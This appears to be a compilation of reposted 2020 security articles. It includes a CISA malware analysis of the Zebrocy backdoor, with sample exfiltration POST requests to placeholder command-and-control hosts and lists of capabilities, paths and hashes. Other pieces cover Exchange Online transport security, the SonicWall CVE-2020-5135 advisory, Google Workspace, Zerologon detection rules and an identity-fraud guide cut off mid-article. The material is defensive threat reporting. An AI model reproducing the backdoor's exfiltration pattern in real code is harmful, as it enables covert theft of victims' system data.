Malware Analysis Report (AR20-303B) MAR-10310246-1.v1 – ZEBROCY Backdoor

Notification

This report is provided “as is” for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:WHITE–Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.us-cert.gov/tlp.

Summary

Description

This Malware Analysis Report (MAR) is the result of analytic efforts between the Cybersecurity and Infrastructure Security Agency (CISA) and the Cyber National Mission Force (CNMF). The malware variant, known as Zebrocy, has been used by a sophisticated cyber actor. CISA and CNMF are distributing this MAR to enable network defense and reduced exposure to malicious activity. This MAR includes suggested response actions and recommended mitigation techniques.

Two Windows executables identified as a new variant of the Zebrocy backdoor were submitted for analysis. The file is designed to allow a remote operator to perform various functions on the compromised system.

Users or administrators should flag activity associated with the malware and report the activity to the CISA or the FBI Cyber Watch (CyWatch), and give the activity the highest priority for enhanced mitigation. For more information on malicious cyber activity, please visit https[:]//www[.]us-cert.gov.

For a downloadable copy of IOCs, see MAR-10310246-1.v1.

Submitted Files (2)

0be114fe30ef5042890c17033b63d7c9e0363972fcc15a61433c598dd33f49d1 (smqft_exe)

2631f95e9a46c821a701269a76b15bb065764cc15a0b268a4d1eac045975c9b8 (sespmw_exe)

Findings

0be114fe30ef5042890c17033b63d7c9e0363972fcc15a61433c598dd33f49d1

Tags

backdoor

Details
Namesmqft_exe
Size4307968 bytes
TypePE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
MD5ba9c59783b52b93aa6dfd4cfffc16f2b
SHA1ee6753448c3960e8f7ba325a2c00009c31615fd2
SHA2560be114fe30ef5042890c17033b63d7c9e0363972fcc15a61433c598dd33f49d1
SHA512bd9e059a9d8fc7deffd12908c01c7c53fbfa9af95296365aa28080d89a668e9eed9c2770ba952cf0174f464dc93e410c92dfdbbaa7bee9f4772affd0c55dee1c
ssdeep49152:vATdsrWzBmMmRytymPIcGkJGUAErdu5Pp6oUlMXH85jHuXJfZLJC23:gYYBmMdEsx5gDXgHuTLJ
Entropy6.196940
Antivirus
BitDefenderGen:Variant.Babar.17722
EmsisoftGen:Variant.Babar.17722 (B)
LavasoftGen:Variant.Babar.17722
YARA Rules

No matches found.

ssdeep Matches

No matches found.

PE Metadata
Compile Date1969-12-31 19:00:00-05:00
Import Hash20acdf581665d0a5acf497c2fe5e0662
PE Sections
MD5NameRaw SizeEntropy
b6114d2ef9c71d56d934ad743f66d209header10242.184050
0ead1c8fd485e916e3564c37083fb754.text19522566.048645
a5a4f98bad8aefba03b1fd8efa3e8668.data1960965.841971
96bfb1a9a7e45816c45b7d7c1bf3c578.rdata21539845.690400
916cd27c0226ce956ed74ddf600a3a94.eh_fram10244.244370
d41d8cd98f00b204e9800998ecf8427e.bss00.000000
1f825370fd049566e1e933455eb0cd06.idata25604.462264
486c39eb96458f6f5bdb80d71bb0f828.CRT5120.118370
aa692f6a7441edad64447679b7d321e8.tls5120.224820
Description

This file is a 32-bit Windows executable written using Golang programming language. The file has been identified as a new variant of the Zebrocy backdoor. The file takes an argument that is supposed to be an Exclusive OR (XOR) and hexadecimal encoded Uniform Resource Identifier (URI) or it can run using a plaintext URI.

Displayed below is a sample plaintext argument used by the malware:

–Begin arguments–
Domain: malware.exe <Domain>
or
IP: malware.exe <IP address:Port>
–End arguments–

When executed, it will encrypt the URI using an Advanced Encryption Standard (AES)-128 Electronic Code Book (ECB) algorithm with a key generated from the victim’s hostname. The encrypted data is hexadecimal encoded and stored into “%AppData%\Roaming\Personalization\EUDC\Policies\3030304332393839394630353537343934453244.”

It also collects information about the victim’s system such as username, 6 bytes of current user’s Security Identifiers (SID), and time of infection. The data is encrypted and hexadecimal encoded before being exfiltrated using the predefined URI:

–Begin POST requests–

–Begin POST request sample–
POST / HTTP/1.1
Host: www[.]<domain>.com
User-Agent: Go-http-client/1.1
Content-Length: 297
Content-Type: multipart/form-data; boundary=ac3d81244405bbbc958b22a748770ad10f9edd7be9946ccfd5b7bb1cc228
Accept-Encoding: gzip

–ac3d81244405bbbc958b22a748770ad10f9edd7be9946ccfd5b7bb1cc228
Content-Disposition: form-data; name=”filename”; filename=”04760175017f0d0d7f7706067302007f0573010204007134463136334635″
Content-Type: application/octet-stream

1
–ac3d81244405bbbc958b22a748770ad10f9edd7be9946ccfd5b7bb1cc228–
–End POST request sample–

–Begin POST request sample–
POST / HTTP/1.1
Host: <IP address>:<Port>
User-Agent: Go-http-client/1.1
Content-Length: 297
Content-Type: multipart/form-data; boundary=44f47dd373e3a0a0afc00d92bba90bc09c7add1bcf4074de385fd04d1108
Accept-Encoding: gzip

–44f47dd373e3a0a0afc00d92bba90bc09c7add1bcf4074de385fd04d1108
Content-Disposition: form-data; name=”filename”; filename=”04760175017f0d0d7f7706067302007f0573010204007134463136334635″
Content-Type: application/octet-stream

1
–44f47dd373e3a0a0afc00d92bba90bc09c7add1bcf4074de385fd04d1108–
–End POST request sample–

–End POST requests–

The malware is designed to encrypt future communication using an AES encryption algorithm.

The malware allows a remote operator to perform the following functions:

–Begin functions–
File manipulation such as creation, modification, and deletion
Screenshot capabilities
Drive enumeration
Command execution (using cmd.exe)
Create scheduled task for persistence
–End functions–

2631f95e9a46c821a701269a76b15bb065764cc15a0b268a4d1eac045975c9b8

Details
Namesespmw_exe
Size4313600 bytes
TypePE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
MD5e8596fd7a15ecc86abbbfdea17a9e73a
SHA1be07f6a2c9d36a7e9c4d48f21e13e912e6271d83
SHA2562631f95e9a46c821a701269a76b15bb065764cc15a0b268a4d1eac045975c9b8
SHA5124a2125a26467ea4eb913abe80a59a85f3341531d634766fccabd14eb8ae1a3e7ee77162df7d5fac362272558db5a6e18f84ce193296fcdfb790e44a52fabe02a
ssdeep49152:J8IkRvcuFh9fQgnf/1th+jrR7PNrNdbMFvm6oUlMXycR+Z5drM0us4:UJHFh91fFg/+MX9RgY0u
Entropy6.197768
Antivirus
BitDefenderGen:Variant.Babar.17722
EmsisoftGen:Variant.Babar.17722 (B)
LavasoftGen:Variant.Babar.17722
YARA Rules

No matches found.

ssdeep Matches

No matches found.

PE Metadata
Compile Date1970-01-04 14:01:20-05:00
Import Hash20acdf581665d0a5acf497c2fe5e0662
PE Sections
MD5NameRaw SizeEntropy
2ebbe6c38d9e8d4da2449cc05f78054aheader10242.198390
a7c0885448e7013e05bf5ff61b673949.text19548166.046127
9bf966747acfa91eea3d6a1ef17cc30f.data1960965.843286
31182660fce8ae07d0350ebe456b9179.rdata21570565.696834
9eeb1eeb42e99c54c6429f9122285336.eh_fram10244.292769
d41d8cd98f00b204e9800998ecf8427e.bss00.000000
0bc884e39b3ba72fb113d63988590b5c.idata25604.424718
9bbfafc74bc296cd99dc8307ffe120ac.CRT5120.114463
2b60c482048e4a03fbb82db9c3416db5.tls5120.224820
Description

This file is a 32-bit Windows executable written using Golang programming language. The file has been identified as new variant of the Zebrocy backdoor. The file takes an argument that is supposed to be an XOR and hexadecimal encoded URI. The file cannot run using a plaintext URI as compared to the other Zebrocy backdoor binary “ba9c59783b52b93aa6dfd4cfffc16f2b”. This file and ba9c59783b52b93aa6dfd4cfffc16f2b have similar functions.

When executed, it will encrypt the URI using AES-128 ECB algorithm with a key generated from the victim’s hostname. The encrypted data is hexadecimal encoded and stored into “%AppData%\Roaming\UserData\Multimedia\Policies\3030304332393839394630353537343934453244”.

It also collects information about the victim’s system such as username, 6 bytes of current user’s SID, and time of infection. The data is encrypted and hexadecimal encoded before exfiltrated using the predefined URI.

–Begin POST request–
POST / HTTP/1.1
Host: www[.]<domain>.com
User-Agent: Go-http-client/1.1
Content-Length: 297
Content-Type: multipart/form-data; boundary=0af2fd2b7a4e61d071fa7002fb2b1472abba9bf8a33543e34ecd00d915db
Accept-Encoding: gzip

–0af2fd2b7a4e61d071fa7002fb2b1472abba9bf8a33543e34ecd00d915db
Content-Disposition: form-data; name=”filename”; filename=”04760175017f0d0d7f7706067302007f0573010204007134463136334635″
Content-Type: application/octet-stream

1
–0af2fd2b7a4e61d071fa7002fb2b1472abba9bf8a33543e34ecd00d915db–
–End POST request–

The malware is designed to encrypt future communication using an AES encryption algorithm.

The malware allows a remote operator to perform the following functions:

–Begin functions–
File manipulation such as creation, modification, and deletion
Screenshot capabilities
Drive enumeration
Command execution (using cmd.exe)
Create schedule a task for persistence manually
More
–End functions–

Recommendations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization’s systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

  1. Maintain up-to-date antivirus signatures and engines.
  2. Keep operating system patches up-to-date.
  3. Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  4. Restrict users’ ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
  5. Enforce a strong password policy and implement regular password changes.
  6. Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
  7. Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
  8. Disable unnecessary services on agency workstations and servers.
  9. Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its “true file type” (i.e., the extension matches the file header).
  10. Monitor users’ web browsing habits; restrict access to sites with unfavorable content.
  11. Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
  12. Scan all software downloaded from the Internet prior to executing.
  13. Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, “Guide to Malware Incident Prevention & Handling for Desktops and Laptops”.

Contact Information

  1. 1-888-282-0870
  2. CISA Service Desk (UNCLASS)
  3. CISA SIPR (SIPRNET)
  4. CISA IC (JWICS)

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://www.cisa.gov/forms/feedback/

Document FAQ

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or CISA Service Desk.

Can I submit malware to CISA? Malware samples can be submitted via three methods:

  1. Web: https://malware.us-cert.gov
  2. E-Mail: submit@malware.us-cert.gov
  3. FTP: ftp.malware.us-cert.gov (anonymous)

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA’s homepage at www.cisa.gov.

Source :
https://us-cert.cisa.gov/ncas/analysis-reports/ar20-303b

Microsoft Office 365 adds protection against downgrade and MITM attacks

Microsoft is working on adding SMTP MTA Strict Transport Security (MTA-STS) support to Exchange Online to ensure Office 365 customers’ email communication security and integrity.

Once MTA-STS is available in Office 365 Exchange Online, emails sent by users via Exchange Online will only one delivered using connections with both authentication and encryption, protecting against both email interception and attacks.

Protection against MITM and downgrade attacks

MTA-STS strengthens Exchange Online email security and solves multiple SMTP security problems including the lack of support for secure protocols, expired TLS certificates, and certs not issued by trusted third parties or matching server domain names.

Given that mail servers will still deliver emails even though a properly secured TLS connection can’t be created, SMTP connections are exposed to various attacks including downgrade and man-in-the-middle attacks.

“[D]owngrade attacks are possible where the STARTTLS response can be deleted, thus rendering the message in clear text,” Microsoft says. “Man-in-the-middle (MITM) attacks are also possible, whereby the message can be rerouted to an attacker’s server.”

“MTA-STS (RFC8461) helps thwart such attacks by providing a mechanism for setting domain policies that specify whether the receiving domain supports TLS and what to do when TLS can’t be negotiated, for example stop the transmission,” the company explains in a Microsoft 365 roadmap entry.

“Exchange Online (EXO) outbound mail flow now supports MTA-STS,” Microsoft also adds.https://www.youtube.com/embed/VY3YvrrHXJk?t=775

Exchange Online SMTP MTA Strict Transport Security (MTA-STS) support is currently in development and the company is planning to make it generally available during December in all environments, for all Exchange Online users.

DNSSEC and DANE for SMTP also coming

Microsoft is also working on including support for the DNSSEC (Domain Name System Security Extensions) and DANE for SMTP (DNS-based Authentication of Named Entities) to Office 365 Exchange Online.

Support for the two SMTP standards will be added to both inbound and outbound mail, “specific to SMTP traffic between SMTP gateways” according to the Microsoft 365 roadmap [12] and this blog post.

According to Microsoft, after including support for the two SMTP security standards in Exchange Online:

  1. DANE for SMTP will provide a more secure method for email transport. DANE uses the presence of DNS TLSA resource records to securely signal TLS support to ensure sending servers can successfully authenticate legitimate receiving email servers. This makes the secure connection resistant to downgrade and MITM attacks.
  2. DNSSEC works by digitally signing records for DNS lookup using public key cryptography. This ensures that the received DNS records have not been tampered with and are authentic. 

Microsoft is planning to release DANE and DNSSEC for SMTP in two phases, with the first one to include only outbound support during December 2020 and with the second to add inbound support by the end of next year.

Source :
https://www.bleepingcomputer.com/news/security/office-365-adds-protection-against-downgrade-and-mitm-attacks/

Critical SonicWall vulnerability affects 800K firewalls, patch now

A critical stack-based Buffer Overflow vulnerability has been discovered in SonicWall VPNs.

When exploited, it allows unauthenticated remote attackers to execute arbitrary code on the impacted devices.

Tracked as CVE-2020-5135, the vulnerability impacts multiple versions of SonicOS ran by hundreds of thousands of active VPNs.

Craig Young of Tripwire Vulnerability and Exposure Research Team (VERT) and Nikita Abramov of Positive Technologies have been credited with discovering and reporting the vulnerability.

Shodan lists over 800,000 devices

Given an increase in employees working remotely and the reliance on corporate VPNs, easily exploitable flaws like these are concerning when it comes to security.

As confirmed by Tenable researchers and observed by BleepingComputer, as of today, Shodan shows over 800,000 VPN devices running vulnerable SonicOS software versions, depending on the search term used.

Although a Proof-of-Concept (POC) exploit is not yet available in the wild, the vast attack surface available to adversaries means companies should upgrade their devices immediately.

sonicwall vpns shodan
Potentially exploitable devices listed on Shodan running vulnerable SonicOS versions
Source: BleepingComputer

Impacted versions and remediation guidance

The following SonicWall VPN devices are impacted by CVE-2020-5135:

  1. SonicOS 6.5.4.7-79n and earlier
  2. SonicOS 6.5.1.11-4n and earlier
  3. SonicOS 6.0.5.3-93o and earlier
  4. SonicOSv 6.5.4.4-44v-21-794 and earlier
  5. SonicOS 7.0.0.0-1

“SonicWall has released updates to remediate this flaw. SSL VPN portals may be disconnected from the Internet as a temporary mitigation before the patch is applied,” stated Tripwire VERT’s advisory.

The following versions are available to upgrade to for safeguarding against this vulnerability:

  1. SonicOS 6.5.4.7-83n
  2. SonicOS 6.5.1.12-1n
  3. SonicOS 6.0.5.3-94o
  4. SonicOS 6.5.4.v-21s-987
  5. Gen 7 7.0.0.0-2 and onwards

Provided the vast number of devices that are still running the outdated SonicOS versions and the critical nature of this vulnerability, complete research findings on CVE-2020-5135 are expected to be released once enough users have patched their systems.

Source :
https://www.bleepingcomputer.com/news/security/critical-sonicwall-vulnerability-affects-800k-firewalls-patch-now/

Introducing Google Workspace

For more than a decade, we’ve been building products to help people transform the way they work.

Now, work itself is transforming in unprecedented ways. For many of us, work is no longer a physical place we go to, and interactions that used to take place in person are being rapidly digitized. Office workers no longer have impromptu discussions at the coffee machine or while walking to meetings together, and instead have turned their homes into workspaces. Frontline workers, from builders on a construction site to delivery specialists keeping critical supply chains moving, are turning to their phones to help get their jobs done. While doctors treating patients and local government agencies engaging with their communities are accelerating how they can use technology to deliver their services. 

Amidst this transformation, time is more fragmented—split between work and personal responsibilities—and human connections are more difficult than ever to establish and maintain.

These are unique challenges, but they also represent a significant opportunity to help people succeed in this highly distributed and increasingly digitized world. With the right solution in place, people are able to collaborate more easily, spend time on what matters most, and foster human connections, no matter where they are.

That solution is Google Workspace: everything you need to get anything done, now in one place. Google Workspace includes all of the productivity apps you know and love—Gmail, Calendar, Drive, Docs, Sheets, Slides, Meet, and many more. Whether you’re returning to the office, working from home, on the frontlines with your mobile device, or connecting with customers, Google Workspace is the best way to create, communicate, and collaborate.https://www.youtube.com/embed/bE31y5HbukA

With Google Workspace, we’re introducing three major developments:

  • new, deeply integrated user experience that helps teams collaborate more effectively, frontline workers stay connected, and businesses power new digital customer experiences
  • new brand identity that reflects our ambitious product vision and the way our products work together
  • new ways to get started with solutions tailored to the unique needs of our broad range of customers 

New user experience

At Next OnAir in July, we announced a better home for work. One that thoughtfully brings together core tools for communication and collaboration—like chat, email, voice and video calling, and content management and collaboration—into a single, unified experience to ensure that employees have access to everything they need in one place. This integrated experience is now generally available to all paying customers of Google Workspace.

In the coming months we’ll also be bringing this new experience to consumers to help them do things like set up a neighborhood group, manage a family budget, or plan a celebration using integrated tools like Gmail, Chat, Meet, Docs, and Tasks. 

We’ve already made it easier for business users to connect with customers and partners using guest access features in Chat and Drive, and in the coming weeks, you’ll be able to dynamically create and collaborate on a document with guests in a Chat room. This makes it easy to share content and directly work together with those outside your organization, and ensure that everyone has access and visibility to the same information.

CreateDoc4.gif

When every minute you spend at work is a minute you could be helping your daughter with her homework, efficiency is everything. We’ve been working hard to add helpful features that make it easier to get your most important work done. For example, in Docs, Sheets, and Slides, you can now preview a linked file without having to open a new tab—which means less time spent moving between apps, and more time getting work done. And beginning today, when you @mention someone in your document, a smart chip will show contact details, including for those outside your organization, provide context and even suggest actions like adding that person to Contacts or reaching out via email, chat or video. 

By connecting you to relevant content and people right in Docs, Sheets and Slides, Google Workspace helps you get more done from where you already are.

05_nofade_sml.gif

We also recognize that reinforcing human connections is even more important when people are working remotely and interacting with their customers digitally. It’s what keeps teams together and helps build trust and loyalty with your customers.

Back in July, we shared that we’re bringing Meet picture-in-picture to Gmail and Chat, so you can actually see and hear the people you’re working with, while you’re collaborating. In the coming months, we’ll be rolling out Meet picture-in-picture to Docs, Sheets, and Slides, too. This is especially powerful for customer interactions where you’re pitching a proposal or walking through a document. Where before, you could only see the file you were presenting, now you’ll get all those valuable nonverbal cues that come with actually seeing someone’s face.

Slide_PiP.gif

And because we know many companies are implementing a mix of remote and in-person work environments, Meet supports a variety of devices with the best of Google AI built-in. From helpful and inclusive Series One hardware kits that provide immersive sound and effortlessly scalability, to native integrations with Chromecast and Nest Smart Displays that make your work experience more enjoyable—whether that’s at home or in the office. 

New brand identity

10 years ago, when many of our products were first developed, they were created as individual apps that solved distinct challenges—like a better email with Gmail, or a new way for individuals to collaborate together with Docs. Over time, our products have become more integrated, so much so that the lines between our apps have started to disappear.

Our new Google Workspace brand reflects this more connected, helpful, and flexible experience, and our icons will reflect the same. In the coming weeks, you will see new four-color icons for Gmail, Drive, Calendar, Meet, and our collaborative content creation tools like Docs, Sheets, Slides that are part of the same family. They represent our commitment to building integrated communication and collaboration experiences for everyone, all with helpfulness from Google.https://www.youtube.com/embed/uZXa0N0-Zu0

We are also bringing Google Workspace to our education and nonprofit customers in the coming months. Education customers can continue to access our tools via G Suite for Education, which includes Classroom, Assignments, Gmail, Calendar, Drive, Docs, Sheets, Slides, and Meet. G Suite for Nonprofits will continue to be available to eligible organizations through the Google for Nonprofits program.

New ways to get started

Simplicity, helpfulness, flexibility—these guiding principles apply both to the way people experience our products and to the way we do business. All of our customers share a need for transformative solutions—whether to power remote work, support frontline workers, create immersive digital experiences for their own customers, or all of the above—but their storage, management, and security and compliance needs often vary greatly. 

In order to provide more choice and help customers get the most out of Google Workspace, we are evolving our editions to provide more tailored offerings. Our new editions for smaller businesses are aimed at those often looking to make fast, self-serviced purchases. Our editions for larger enterprises are designed to help organizations that have more complex implementation needs and often require technical assistance over the course of a longer buying and deployment cycle. 

You can learn more about these new offerings on our pricing page. And existing customers can read more here.

Empowering our customers and partners

You, our customers and our users, are our inspiration as we work together to navigate the change ahead. This is an incredibly challenging time, but we believe it’s also the beginning of a new approach to working together. One that is more productive, collaborative, and impactful.

Google Workspace embodies our vision for a future where work is more flexible, time is more precious, and enabling stronger human connections becomes even more important. It’s a vision we’ve been building toward for more than a decade, and one we’re excited to bring to life together with you.

Source :
https://cloud.google.com/blog/products/workspace/introducing-google-workspace

“Zerologon” Understanding the Issues and Applying Solutions

A new CVE was released recently that has made quite a few headlines – CVE-2020-1472. Zerologon, as it’s called, may allow an attacker to take advantage of the cryptographic algorithm used in the Netlogon authentication process and impersonate the identity of any computer when trying to authenticate against the domain controller.

To put that more simply, this vulnerability in the Netlogon Remote Protocol (MS-NRPC) could allow attackers to run their applications on a device on the network. An unauthenticated attacker would use MS-NRPC to connect to a Domain Controller (DC) to obtain administrative access.

According to Dustin Childs with Trend Micro’s Zero Day Initiative (ZDI), “What’s worse is that there is not a full fix available. This patch enables the DCs to protect devices, but a second patch currently slated for Q1 2021 enforces secure Remote Procedure Call (RPC) with Netlogon to fully address this bug. After applying this patch, you’ll still need to make changes to your DC. Microsoft published guidelines to help administrators choose the correct settings.”

But if there’s a patch, why is this a big deal?
You might be thinking, “Well if there’s a patch, this really isn’t an issue.” But the idea of “just patch it” is not as easy as it sounds – check out this post (also from Dustin with the ZDI) for more insights on barriers to patching.

The average Mean Time to Patch (MTTP) is 60 to 150 days. This CVE was published in early August, so that would put the average time for implementing this patch between October 2020 and January 2021.

You have maybe heard the security industry joke that after Patch Tuesday comes Exploit Wednesday. That’s the comedic way to suggest that after a batch of patches for new CVEs are released the first Tuesday of every month from Microsoft and Adobe, attackers get to work reversing the patches to write exploits to take advantage of the bugs before patches have been applied.

Given the MTTP, that’s 2-5 months that your organization is left exposed to a known threat.

So what can I do to protect my organization?
Fortunately, there are advanced protections available for organizations to stay protected, including virtual patching. This provides an extra layer of security to help protect against vulnerabilities before you apply the official vendor patch. As the name suggests, it’s very similar to a patch because it is specifically designed to protect your environment with intrusion protection system (IPS) capabilities in case someone attempted to exploit that vulnerability. In general, virtual patches can be a critical safety net to allow you to patch in the way that works for your organization.


With Trend Micro, our virtual patching technology helps you mitigate attacks focused on thousands of vulnerabilities, giving you the flexibility to patch regularly without breaking your operational processes for every emergency patch. Other features, such as log inspection, also help you get valuable insight into post-patch exploitation attempts on your network even after you have fully patched. To learn more about Trend Micro protection for CVE-2020-1472, read our knowledge base article here.

On September 11, 2020, detailed technical information was made public regarding a critical Microsoft Windows vulnerability (CVSS 10) that was included in Microsoft’s August 2020 Patch Tuesday set of updates and appears to affect all currently supported Windows Server (2008 R2 and above).

When originally disclosed in August, the vulnerability was given the official designation of CVE-2020-1472, but not much detail on the vulnerability itself was made public.

However, we know that this vulnerability, now dubbed “Zerologon,” may allow an attacker to take advantage of the cryptographic algorithm used in the Netlogon authentication process and impersonate the identity of any computer when trying to authenticate against the domain controller. From there, a variety of other attacks, including but not limited to disabling security features, changing passwords, and essentially taking over the domain are possible.

The entire attack as demonstrated, is very fast, and can be executed in approximately 3 seconds, so it could be very dangerous. In addition, Trend Micro is now aware of weaponized proof-of-concept code that has been made publicly available, meaning that real exploits could be close behind.
DETAILS
Mitigation and Protection

First and foremost, the first line of protection against this vulnerability is to ensure that all affected systems are patched with Microsoft’s latest security update. This continues to be the primary recommendation for protection against any exploit that that may arise from this vulnerability.

According to the research, there is one serious limitation to exploits of this vulnerability – specifically it cannot be exploited remotely. An attacker will first need to gain access to the network domain via other means (legitimately or not). So one major mitigation point would be to ensure that network access (both physical and remote) are carefully guarded. However, if an attacker has obtained access to a network via another vulnerability or legitimately, this could become a powerful exploit.

Trend Micro Protection

To assist customers, Trend Micro has created and released some additional layers of protection in the form of Deep Security and Cloud One – Workload Security IPS rules and TippingPoint filters that may help organizations strengthen their overall security posture, especially in situations where comprehensive patching may take time or is not feasible.

IPS Rules

Deep Security and Cloud One – Workload Security, Vulnerability Protection and Apex One Vulnerability Protection (iVP)
Rule 1010519 – Netlogon Elevation of Privilege Vulnerability (CVE-2020-1472)
Rule 1010521 – Netlogon Elevation of Privilege Vulnerability Over SMB (CVE-2020-1472)
Rule 1010539 – Identified NTLM Brute Force Attempt (ZeroLogon) (CVE-2020-1472)
Please note that the rules are already set to Prevent.

Worry-Free Business Security Services
Microsoft Windows Netlogon Elevation Of Privilege Vulnerability Over SMB (CVE-2020-1472)
Microsoft Windows Netlogon Elevation Of Privilege Vulnerability (CVE-2020-1472)
TippingPoint
Filter 38166: MS-NRPC: Microsoft Windows Netlogon Zerologon Authentication Bypass Attempt
Filter 38235: MS-NRPC: Microsoft Windows NetrServerAuthenticate Request
Please note that the posture on this filter has been changed to Enable by Default.

Trend Micro TxONE
1137620: RPC Netlogon Elevation of Privilege Vulnerability (CVE-2020-1472)

Other Inspection / Detection Rules

Deep Security Log Inspection
1010541 – Netlogon Elevation Of Privilege Vulnerability (Zerologon) (CVE-2020-1472)
This Log Inspection (LI) rule for Deep Security gives administrators visibility into potential exploit activity. Due to the complexity of this vulnerability, the Log Inspection rule will only log activities against systems that have already applied the Microsoft patch. Administrators who have patched critical servers with Deep Security may find this information useful internally to help accelerate patching of endpoints and non-critical systems if there is evidence of activity in their environment.

Deep Discovery Inspector
Rule 4453: CVE-2020-1472_DCE_RPC_ZEROLOGON_EXPLOIT_REQUEST
Rule 4455: CVE-2020-1472_SMB2_ZEROLOGON_EXPLOIT_REQUEST

Trend Micro is continuing to aggressively look into other forms of detection and protection to assist our customers, but we do want to continue to reiterate that the primary recommendation is to apply the official Microsoft patches as soon as possible. We will continue to update this article and our customers if/when additional layers of protection are found.

References
Trend Micro Blog: Zerologon” and the Value of Virtual Patching – https://www.trendmicro.com/en_us/research/20/i/zerologon-and-value-of-virtual-patching.html
Trend Micro Video (Youtube) – Cloud One – Workload Security about Zerologon
Microsoft Advisory – https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472

Source :

https://www.trendmicro.com/en_us/research/20/i/zerologon-and-value-of-virtual-patching.html

https://success.trendmicro.com/solution/000270328?_ga=2.197085612.1262457598.1602397006-1044924476.1597417197

Identity Fraud: How to Protect Your Identity Data, Accounts and Money During the Coronavirus Crisis

We’ve all been spending more of our time online since the crisis hit. Whether it’s ordering food for delivery, livestreaming concerts, holding virtual parties, or engaging in a little retail therapy, the digital interactions of many Americans are on the rise. This means we’re also sharing more of our personal and financial information online, with each other and the organizations we interact with. Unfortunately, as ever, there are bad guys around every digital corner looking for a piece of the action.

The bottom line is that personally identifiable information (PII) is the currency of internet crime. And cyber-criminals will do whatever they can to get their hands on it. When they commit identity theft with this data, it can be a messy business, potentially taking months for banks and businesses to investigate before you get your money and credit rating back. At a time of extreme financial hardship, this is the last thing anyone needs.

It therefore pays to be careful about how you use your data and how you protect it. Even more: it’s time to get proactive and monitor it—to try and spot early on if it has been stolen. Here’s what you need to know to protect your identity data.

How identity theft works

First, some data on the scope of the problem. In the second quarter of 2020 alone 349,641 identity theft reports were filed with the FTC. To put that in perspective, it’s over half of the number for the whole of 2019 (650,572), when consumers reported losing more than $1.9 billion to fraud. What’s driving this huge industry? A cybercrime economy estimated to be worth as much as $1.5 trillion annually.

Specialized online marketplaces and private forums provide a user-friendly way for cyber-criminals and fraudsters to easily buy and sell stolen identity data. Many are on the so-called dark web, which is hidden from search engines and requires a specialized anonymizing browser like Tor to access. However, plenty of this criminal activity also happens in plain sight, on social media sites and messaging platforms. This underground industry is an unstoppable force: as avenues are closed down by law enforcement or criminal in-fighting, other ones appear.

At-risk personal data could be anything from email and account log-ins to medical info, SSNs, card and bank details, insurance details and much more. It all has a value on the cybercrime underground and the price fraudsters are prepared to pay will depend on supply and demand, just like in the ‘real’ world.

There are various ways for attackers to get your data. The main ones are:

Phishing: usually aimed at stealing your log-ins or tricking you into downloading keylogging or other info-stealing malware. Phishing mainly happens via email but could also occur via web, text, or phone. Around $667m was lost in imposter scams last year, according to the FTC.Malicious mobile apps disguised as legitimate software.Eavesdropping on social media: If you overshare even innocuous personal data (pet names, birth dates, etc.,) it could be used by fraudsters to access your accounts.Public Wi-Fi eavesdropping: If you’re using it, the bad guys may be too.Dumpster diving and shoulder surfing: Sometimes the old ways are still popular.Stealing devices or finding lost/misplaced devices in public places.Attacking the organizations you interact with: Unfortunately this is out of your control somewhat, but it’s no less serious. There were 1,473 reported corporate breaches in 2019, up 17% year-on-year.Harvesting card details covertly from the sites you shop with. Incidents involving this kind of “web skimming” increased 26% in March as more users flocked to e-commerce sites during lockdown.

The COVID-19 challenge

As if this weren’t enough, consumers are especially exposed to risk during the current pandemic. Hackers are using the COVID-19 threat as a lure to infect your PC or steal identity data via the phishing tactics described above. They often impersonate trustworthy institutions/officials and emails may claim to include new information on outbreaks, or vaccines. Clicking through or divulging your personal info will land you in trouble. Other fraud attempts will try to sell counterfeit or non-existent medical or other products to help combat infection, harvesting your card details in the process. In March, Interpol seized 34,000 counterfeit COVID goods like surgical masks and $14m worth of potentially dangerous pharmaceuticals.

Phone-based attacks are also on the rise, especially those impersonating government officials. The aim here is to steal your identity data and apply for government emergency stimulus funds in your name. Of the 349,641 identity theft reports filed with the FTC in Q2 2020, 77,684 were specific to government documents or benefits fraud.

What do cybercriminals do with my identity data?

Once your PII is stolen, it’s typically sold on the dark web to those who use it for malicious purposes. It could be used to:

Crack open other accounts that share the same log-ins (via credential stuffing). There were 30 billion such attempts in 2018.Log-in to your online bank accounts to drain it of funds.Open bank accounts/credit lines in your name (this can affect your credit rating).Order phones in your name or port your SIM to a new device (this impacts 7,000 Verizon customers per month).Purchase expensive items in your name, such as a new watch or television, for criminal resale. This is often done by hijacking your online accounts with e-tailers. E-commerce fraud is said to be worth around $12 billion per year.File fraudulent tax returns to collect refunds on your behalf.Claim medical care using your insurance details.Potentially crack work accounts to attack your employer.

How do I protect my identity online?

